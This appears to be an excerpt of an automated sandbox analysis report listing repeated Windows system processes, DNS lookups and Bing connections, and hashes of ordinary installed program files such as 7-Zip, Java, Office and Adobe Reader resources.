"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
Files
C:\Program Files\7-Zip\7zFM.exe
| MD5 | 45d3d62890fa98b808e4379a0a399baf |
| SHA1 | 5b5459717f961d20f002e3c5d3268906a71e7f73 |
| SHA256 | de96183d3d1e3c5a790c8fb31df0c6879d3bf1ca64b10be23452b58ee8e2b69e |
| SHA512 | 748cdde074183fe2780a236a9cf3e8141c5a79f492cad5656e44f706a74a58575015181d32d39bc177a4b68a045f7f0b836ba9d66e73fefe9877efb5744d6f2f |
C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es\readme.txt
| MD5 | dbac9649c4bd702f55fbd1afafe87c44 |
| SHA1 | 0d914f4a809cfe400ca111ebfbd0ad552d500785 |
| SHA256 | b9dfa3b30224bd5eef298531c945d5f2f6bb978b7ef42e5ef09715a535172127 |
| SHA512 | 86d7786b400303b1fb722689aba7e8ef6a01ad7e2776194c5d545a7d7357dd91e7079296790587210683db7f4385f98f281272fd3d1ad6770dabf401709a6415 |
C:\Program Files\Java\jre-1.8\legal\jdk\pkcs11wrapper.md
| MD5 | 950ac8e007b49ed7acf1646758393817 |
| SHA1 | 3a795f27aac36ba92f33165a6550cc7f201b3254 |
| SHA256 | 4ab0585ac1cc953813901847e774a0a6e2542bedd0e5964cacf31e421455223e |
| SHA512 | 6bf7c6bdc1f802cdc8cea1d5a22de2e2cdf307411504499351fa5e9bdb7d1826c1968c4cc8bbb2fc17ea69850d69e0e2d77b76d29ad991813b598fc18ea0982e |
C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt
| MD5 | f0be99f92d8b8ad3d79c9aa580fc2f08 |
| SHA1 | a9ab5160208575c2c19277491406d5c95690a5f0 |
| SHA256 | e290cb91a6aaf54bb397c8f72d0bf5e8a70935ca00abde862e3d13fdf75fdbb0 |
| SHA512 | c9c2002d0f14f1d92924f80105c4b092bcb8de5bcb838179f2129b125fbcdf83f78ee80f44b0e26bab451c6fa5d6a29547a4933a92858e310dfbbdcee32f8cae |
C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml
| MD5 | c181d62d13f055127f354bb60cdfa03b |
| SHA1 | 6cbfcbcdb417807d7ce1ffeeaa2eaaf9b548885a |
| SHA256 | d8dc1b9aa2aefd658fae2d9b6bf36318bdda72fcecba0538a1f121592b44e3b6 |
| SHA512 | 62dd4c375f5e3299843c78dc86026da551a8a66c2c4cfac4003b8e4774ddd1cc36c130611c15182b61a472169305b75c845f17ec899e53250461867cc82abd36 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_2x.png
| MD5 | 7d00bc0d46dcb90890a4fe6b76bc5c3a |
| SHA1 | 7159b1e1c264a6863708a971eaeca32cff864aa1 |
| SHA256 | 2fcd2848cbcab1a3b8154138288cc659cd2c187412cb887eec6554b6165b8c33 |
| SHA512 | 2f113cb27028aa0fa0f028b09ddcddb4a1ede6ae0823909d99763db6e5be57b1b4ae6977537ec17808cd622bc548e1ba3122e35b58de9d856400d33042234a35 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_hover.png
| MD5 | 1dc5d31ef9205f1034b64d635d59cb32 |
| SHA1 | c172576576c5ac5a3c2912bdfd0c8365b5365513 |
| SHA256 | 676d1f912a22a12ad4c80bf552355a7e0995c56e6ef7527aaa9b77e513efc065 |
| SHA512 | bc334638acb1416787df04cbaebde99cd15d96c5b96b6f950cbdfb54177fcd2f2ecce4dc9212a9a3f2f85269ac901aef147ec6297c31c5ee6cc39ee4cdac17c1 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\ui-strings.js
| MD5 | 6e8d259daabf1168ae5136a3de48ee80 |
| SHA1 | b015257e3ae0810ddbda53c0b12991161a863ffb |
| SHA256 | 13370a65ca7e31fbf3a133156c208bf99c01a54880d55a8a4500495683e3a47f |
| SHA512 | cf3c564c18c6b0965a431cda1ed8fa97cbeeb839d992e48f77c073bc8054ead03b4823df381c5179d3d398877da3473b92d70ae905a2bd0c7e5fc45505340113 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\ui-strings.js
| MD5 | 88151ac4ebd7f5ff2d381c65e68cece7 |
| SHA1 | f979db4063d15ef2e32db3c38890899bb87c78e5 |
| SHA256 | c1ea4ada9462abd4ec352dfaf670575e9caff1e55d303db96a2f2500d50d92e8 |
| SHA512 | 326195f5176beed6cc39849b8d6e87a5136c41a04aa76f53c30bbed1ff74391e16a6114e236f39d403c7f82fda032c00a9ee1df583412dfea224047e51f4c3bb |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\ui-strings.js
| MD5 | 60f1a26612dc049ce3e00fe917b6475d |
| SHA1 | 05791d089cbcd759088adbbd9483433dc9a10206 |
| SHA256 | 8ced84488e1ea81e8cc3ec1a25f5b849de902601bef557b6ec65f9de2982bece |
| SHA512 | 06f080a9df9081a2bfd557165f9c21cf2bce3ee161c0896a9f9a6e0f8a3ae545b1cfaaca9ce1d46757dbe0163ddd0421bdb51558ef092dd0a6e5c2052ead4706 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png
| MD5 | ea321d33cfeb1d029794bd01c5b78e85 |
| SHA1 | 4e04b2d8f7f23f44f96f4bbf134233e1feb5e28b |
| SHA256 | 3add439f478220ce8001abf2543810144a0d80f8116bc0ca13947c9745983c55 |
| SHA512 | f574d12330a668d89402265cf5a859a76325ed548e1730e02f51dfd36e3d5dccf2c8b75a76a8c931597bfc130a42364c73eef0200523d4eefbcf4fa5ccacddea |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png
| MD5 | a660ce180dea34b4944d83569f4789bc |
| SHA1 | e3ca7b90c8bd299c49585bd29bc3fb7494c0fa4e |
| SHA256 | 03ab6f2f396e0531f1b1299b61485408cff93f183942910a7d0d5f0c7a666bd8 |
| SHA512 | 9de185c0e6a8cc49852ebb454a00a7a19f5382b358327d393a6952b32099036147c1eb799cc60078bf24477e9607a1b4c88288a213a8ffcafd8d60caab0f0720 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js
| MD5 | cdc58b2bf0a1a34f96af8fdcb62dc30b |
| SHA1 | 69eb0d674e9830e81cecdd610792225a2a5dc265 |
| SHA256 | 3b5888b652cd86408bdd59e86405d3f171d23132059228544fbe693cfcb2b73c |
| SHA512 | d8ef3220b8984f759347a0e83eb75939c914bf865db492d28e226f113b469a97325befa008886743aeae2e0f32c74c0a1e7ce8b60eaf5949b51058a618daa502 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png
| MD5 | 55c2b47c9aea50661a855fe91eb8ac32 |
| SHA1 | 13ea23a51394ea2c13420ddac1294eae6f82f846 |
